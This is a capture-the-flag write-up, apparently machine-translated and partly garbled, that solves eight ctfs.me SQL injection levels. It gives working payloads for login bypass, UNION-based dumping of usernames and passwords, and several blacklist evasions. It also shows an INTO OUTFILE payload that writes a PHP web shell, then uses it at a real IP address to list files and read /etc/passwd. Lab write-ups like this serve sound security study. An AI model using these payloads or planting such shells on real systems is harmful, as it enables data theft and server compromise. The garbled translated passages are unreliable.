SQL injection Exercise/ctfs.me SQL injection

SQL injection Exercises

From the ctfs.me of a problem, really do not come out, Google WP, found that the topic is quoted from other problem sets, and the original topic is the source of ... So I took the opportunity to do his problem again.

Level1

This problem actually does not have the source code to be able to do, but needs to ponder briefly
$query = "SELECT * FROM secrets WHERE session_id = ‘" . $_POST[‘session_id‘] . "‘";
In this statement, we need to let the where behind is true, so we need to use or, a relatively simple topic
Payload1‘ or 1=1 #
In Get your secrets inside, you can get all the secrets, the first one is flag

Level2

This problem is very ctfs.me on the road, I do not know how to do the big guy.
If you do not give the source, I first think of the universal password login, after a meal operation, found that the injection point in the location of the user name can not login, GG
For the idea, consider this landing echo
Payloadusername:1‘order by 1# &password=dd
Echo: Username/password is invalid
Payload: ' username:1 ' ORDER by &password=dd '
echo: Invalid SQL query

Can know only one column, so we can look at the echo position
Payloadusername=1‘ union select 1 -- -&password=dd
Echo ... , back to the flag, but the page is not real, see the source found another flag,get!

If you give the source code, it's a little bit simpler.

if (isset($_POST[‘username‘]) && isset($_POST[‘password‘])) {    // $query = "SELECT flag FROM my_secret_table"; We leave commented code in production because we‘re cool.     $query = "SELECT username FROM users where username = ‘" . $_POST[‘username‘] . "‘ and password = ?";    // We use prepared statements, it must be secure.

Direct construction of payload:username=1‘union select flag from my_secret_table

Level3-the blacklist Saga (Part 1)

$filter = array(‘union‘, ‘select‘);    // Remove all banned characters    foreach ($filter as $banned) {        $_GET[‘q‘] = preg_replace(‘/‘ . $banned . ‘/i‘, ‘‘, $_GET[‘q‘]);    

Filters the union and select keywords, replaces the union and select keywords with preg_replace, and is case insensitive ("/I")
I used to see this kind of bypass way uni/**/on, this attempt is invalid ...
But because the substitution keyword is a null character, you can construct this uniunionon , preg_replace the Union of the middle of the string to a blank, and the rest of the characters together again into union
Payload1‘uniunionon seleselectct 1,username,password from users #
Simple process:

1. Use order by to measure the number of columns1‘order by 3#
2. Then use the INFORMATION_SCHEMA library to check the table name, column name, you can

Get flag

Level 4-the blacklist Saga (Part 2)

 $filter = array(‘UNION‘, ‘SELECT‘);    // Remove all banned characters    foreach ($filter as $banned) {        if (strpos($_GET[‘q‘], $banned) !== false) die("Hacker detected");         if (strpos($_GET[‘q‘], strtolower($banned)) !== false) die("Hacker detected");     

Compare the uppercase form of the blacklist, lowercase, but the case is mixed, so you can use the size blend to bypass
Payload1‘uNion Select 1,username,password from users #

Level 5-the blacklist Saga (Part 3)

// Ban space character    

Filter out spaces, spaces Bypass, use MySQL annotations/**/
Payload1‘union/**/select/**/1,username,password/**/from/**/users/**/#

Level 6-the blacklist Saga (Part 4)

// Ban space character    if (strpos($_GET[‘q‘], "‘") !== false) die("Hacker detected");     if (strpos($_GET[‘q‘], ‘"‘) !== false) die("Hacker detected");

Filter single and double quotes, but can be constructed from the original SQL statement
$query = "SELECT * FROM search_engine WHERE title LIKE ‘" . $_GET[‘q‘]. "‘ OR description LIKE ‘" . $_GET[‘q‘] . "‘ OR link LIKE ‘" . $_GET[‘q‘] . "‘;";
Payloadand 0 union select 1,username,password from users #\
Specific:
SELECT * from Search_engine where title like 'and 0 Union select 1,username,password from Users #\' or description like 'and 0 Union select 1,username,password from Users #\' or link like 'and 0 Union select 1,username,password from Users #\‘;
You can see a total of 6 single quotes, but because of the function of ' \ ', the second, fourth, and sixth single quotes are escaped, withSQLAgentand 0 Union select 1,username,password from Users #\, the results are as follows:
select * from search_engine where title like ‘SQL \‘ or description like ‘SQL \‘ or link like ‘SQL\‘
Remove the escaped single quotation mark
select * from search_engine where title like ‘SQL or description like ‘SQL or link like ‘SQL
RestoresSQL, because the argument after the title likeSQL or description like‘是一个字符串，所以SQL不用还原，而且SQL最后面是一个注释符号，所以上面语句中第二个SQL后面被注释，可以省略SELECT * from Search_engine where title like ' SQL or description likeand 0 union select 1,username,password from users #
Just a little bit simpler:
select * from search_engine where title like ‘xxxx‘ and 0 union select 1,username,password from users #
Ok

Level 7

Level 8 first.

Level 8-the Final Challenge

View source, found two hidden forms

<!--<li><a href="/uploads/">Our files</a></li>--><!--<li><a href="/phpinfo.php">Debug</a></li>-->

You can know that the files that are allowed to be uploaded are inside uploads
See Phpinfo DOCUMENT_ROOT /var/www/html , know the website address is this, so we can be SQL into outifle php a word, output to PHP file
Payload1 union select "<?php system($_GET[\"cmd\"]);?> ", "" into outfile "/var/www/html/uploads/temp2.php"#

35.184.20.243:8003/uploads/temp2.php?cmd=ls
View system files, flag in the top level directory, use Cat to read it.

Leve7

Use Level8 's shell to cat /etc/passwd get flag, or view Level7 's flag.php source file to get flag
But I think it might be a bit of a problem, there may be other practices that haven't been thought

SQL injection Exercise/ctfs.me SQL injection